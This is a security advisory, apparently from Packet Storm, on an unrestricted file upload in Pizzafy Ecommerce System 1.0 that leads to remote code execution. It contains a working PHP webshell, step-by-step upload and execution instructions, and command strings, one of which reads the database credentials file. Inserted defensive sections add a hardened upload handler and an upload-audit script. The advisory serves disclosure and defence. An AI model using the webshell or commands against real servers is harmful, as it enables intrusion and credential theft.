Pizzafy Ecommerce System 1.0 Shell Upload

Reported by Imad Alvi, 29 Apr 2026. Type: packetstorm. Source: packetstorm.news. 54 views.

save_menu() uploads images without type validation, enabling a webshell upload and remote code execution.

# Pizzafy Ecommerce System 1.0 – Unrestricted File Upload in save_menu() Leads to Remote Code Execution

## Details

| Field | Value |
|---|---|
| **Vendor** | SourceCodester |
| **Vendor URL** | https://www.sourcecodester.com |
| **Product** | Pizzafy Ecommerce System using PHP and MySQL |
| **Product URL** | https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html |
| **Version** | 1.0 |
| **Vulnerability** | Unrestricted File Upload → Remote Code Execution |
| **CWE** | CWE-434 |
| **CVSSv3 Score** | 7.8 (High) |
| **Attack Vector** | Network |
| **Auth Required** | Yes (Administrator) |
| **User Interaction** | None |
| **Researcher** | Imad Alvi |
| **Date** | 2026-04-12 |

---

## Affected Component

**File:** `Pizzafy/admin/admin_class_novo.php` → `save_menu()` function  
**Parameter:** `img` (FILE)  
**Upload path:** `Pizzafy/assets/img/`

---

## Description

The `save_menu()` function in Pizzafy Ecommerce System 1.0 handles image uploads for menu items without performing any file type validation. The application retrieves the file extension using `pathinfo()` but never checks or restricts the allowed file types before moving the uploaded file to the web-accessible `assets/img/` directory. An authenticated administrator can upload a PHP webshell disguised as a menu image, then access it directly via the browser to achieve Remote Code Execution on the server.

**Vulnerable code in `admin_class_novo.php`:**

```php
function save_menu(){
    extract($_POST);
    // ...
    if($_FILES['img']['tmp_name'] != ''){
        $fname = strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
        $move = move_uploaded_file($_FILES['img']['tmp_name'],'../assets/img/'. $fname);
        $data .= ", img_path = '$fname' ";
    }
    // No extension check, no MIME type check
}
```
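As an added example, not code from the advisory or from Pizzafy itself, the same upload branch rewritten so that the stored type is decided from the file's bytes and the stored name is chosen by the server. It assumes the same `$_FILES['img']` input and `../assets/img/` target as the original; the allowed-type list and size cap are assumptions.

```php
<?php
// Added example (not Pizzafy's own code): hardened replacement for the upload
// branch of save_menu(). Allowed types and size cap below are assumptions.
const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
    'image/webp' => 'webp',
];
const MAX_IMAGE_BYTES = 2 * 1024 * 1024;

// Validate an uploaded image and move it into $uploadDir under a server-chosen
// name. Returns the stored file name; throws on any validation failure.
function store_menu_image(array $file, string $uploadDir): string
{
    // Transport-level errors and partial uploads are rejected first.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed or missing');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > MAX_IMAGE_BYTES) {
        throw new RuntimeException('image too large');
    }
    // Decide the type from the bytes, never from the client file name or
    // the client-supplied $file['type'].
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!is_string($mime) || !isset(ALLOWED_IMAGE_TYPES[$mime])) {
        throw new RuntimeException('disallowed content type');
    }
    // Second opinion from the image decoder: a PHP file renamed .png fails here.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not a decodable image');
    }
    // Random name with a whitelisted extension: nothing from the request is reused.
    $fname  = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    $target = rtrim($uploadDir, '/') . '/' . $fname;
    if (!move_uploaded_file($file['tmp_name'], $target)) {
        throw new RuntimeException('could not store image');
    }
    chmod($target, 0644); // readable, never executable
    return $fname;
}

// Inside save_menu(), in place of the unchecked move_uploaded_file() call.
// $fname is hex plus a fixed extension, so interpolating it into $data is safe.
if (isset($_FILES['img']) && $_FILES['img']['tmp_name'] !== '') {
    $fname = store_menu_image($_FILES['img'], __DIR__ . '/../assets/img');
    $data .= ", img_path = '$fname' ";
}
```

Disabling PHP execution for `assets/img/` in the web server configuration and turning off directory listing (the CWE-548 weakness this advisory also notes) are complementary controls that hold even if the handler regresses.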

---

## Proof of Concept

### Step 1 — Create PHP Webshell

Create a file named `shell_web2.php` with the following content:

```php
<?php echo shell_exec($_GET['cmd']); ?>
```

### Step 2 — Upload Webshell via Menu Management

Log in as administrator and navigate to:

```
http://localhost/pizzafy/Pizzafy/admin/index.php?page=menu
```

Fill in the Menu Form with any valid values and select `shell_web2.php` as the Image file. Click **Save**.

<img width="1920" height="1080" alt="Screenshot 2026-04-12 171202" src="https://github.com/user-attachments/assets/092e31ba-d034-4711-9eac-0d409fc02ead" />

The shell is now listed as a menu item on the customer-facing page.

<img width="1920" height="1080" alt="Screenshot 2026-04-12 171236" src="https://github.com/user-attachments/assets/8e4cd4e2-98ca-4f7a-8d5b-1728aaf89731" />

### Step 3 — Locate Uploaded Shell

Navigate to the assets directory — directory listing is enabled (CWE-548):

```
http://192.168.0.9/pizzafy/Pizzafy/assets/img/
```

The uploaded PHP shell is visible in the directory listing.

<img width="1920" height="1080" alt="Screenshot 2026-04-12 171300" src="https://github.com/user-attachments/assets/b51aac51-6baf-41df-8b8f-53f9370864c8" />

### Step 4 — Execute Remote Commands

Access the uploaded shell directly and pass system commands via the `cmd` parameter:

```
http://192.168.0.9/pizzafy/Pizzafy/assets/img/1775994120_shell_web2.php?cmd=whoami
```

**Response — OS command executed on the server:**

```
desktop-g1i9np3\dell
```

<img width="1920" height="1080" alt="Screenshot 2026-04-12 171313" src="https://github.com/user-attachments/assets/403e069d-2d07-4a5d-8e68-0b95902c148e" />

---

## Additional Commands

```
?cmd=whoami
?cmd=ipconfig
?cmd=dir C:\xampp\htdocs\pizzafy
?cmd=type C:\xampp\htdocs\pizzafy\Pizzafy\admin\db_connect.php
```

---

## Impact

An authenticated administrator can:
- Upload arbitrary PHP files to the web server
- Execute any OS-level command on the server
- Read sensitive files including database credentials
- Establish a reverse shell for full persistent access
- Completely compromise the underlying server

---

## Note on Directory Listing (CWE-548)

The `assets/img/` directory has directory listing enabled, allowing unauthenticated users to browse all uploaded files, including the webshell. This compounds the severity of the file upload vulnerability.
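For responders checking an existing deployment, the following is an added example (not part of the advisory or of Pizzafy) that walks an upload directory and flags anything that is not a genuine image: a non-image extension, content the image decoder rejects, or a PHP open tag embedded in the bytes. The directory path is an assumption and should be set to the deployment's `assets/img/`.

```php
<?php
// Added example (not Pizzafy's own code): audit an upload directory for
// files that should never live there. Usage: php audit_uploads.php /path/to/assets/img
const IMAGE_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'webp'];

// Return the reasons a file is suspicious; an empty array means it looks like a plain image.
function audit_upload(string $path): array
{
    $reasons = [];
    $ext = strtolower(pathinfo($path, PATHINFO_EXTENSION));
    if (!in_array($ext, IMAGE_EXTENSIONS, true)) {
        $reasons[] = "non-image extension .$ext";
    }
    // Content check: the decoder must accept it as an image regardless of its name.
    if (@getimagesize($path) === false) {
        $reasons[] = 'not a decodable image';
    }
    // PHP open tags in the first 1 MiB catch both bare scripts and image/PHP polyglots.
    // "<?xml" in XMP metadata is deliberately not matched.
    $head = file_get_contents($path, false, null, 0, 1024 * 1024);
    if ($head !== false && preg_match('/<\?(php|=)/i', $head)) {
        $reasons[] = 'contains a PHP open tag';
    }
    return $reasons;
}

// Map of file name => reasons, for every suspicious regular file in $dir.
function audit_directory(string $dir): array
{
    $findings = [];
    foreach (new DirectoryIterator($dir) as $entry) {
        if ($entry->isDot() || !$entry->isFile()) {
            continue;
        }
        $reasons = audit_upload($entry->getPathname());
        if ($reasons !== []) {
            $findings[$entry->getFilename()] = $reasons;
        }
    }
    return $findings;
}

$dir = $argv[1] ?? __DIR__ . '/assets/img';   // assumed default location
foreach (audit_directory($dir) as $name => $reasons) {
    echo $name, ': ', implode('; ', $reasons), PHP_EOL;
}
```

Any hit should be treated as a potential compromise indicator and preserved for forensics rather than simply deleted, since the web server logs for that file name show when and from where it was reached.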

---

## References

- [SourceCodester — Pizzafy Ecommerce System](https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html)
- CWE-434: Unrestricted Upload of File with Dangerous Type
- CWE-548: Exposure of Information Through Directory Listing


Vulners scores (current as of 29 Apr 2026 00:00):
- Vulners AI Score: 6 (Medium risk)
- CVSS 3.1: 4.7
- CVSS 4: 5.1
- CVSS 2: 5.8
- CVSS 3: 4.7
- EPSS: 0.0005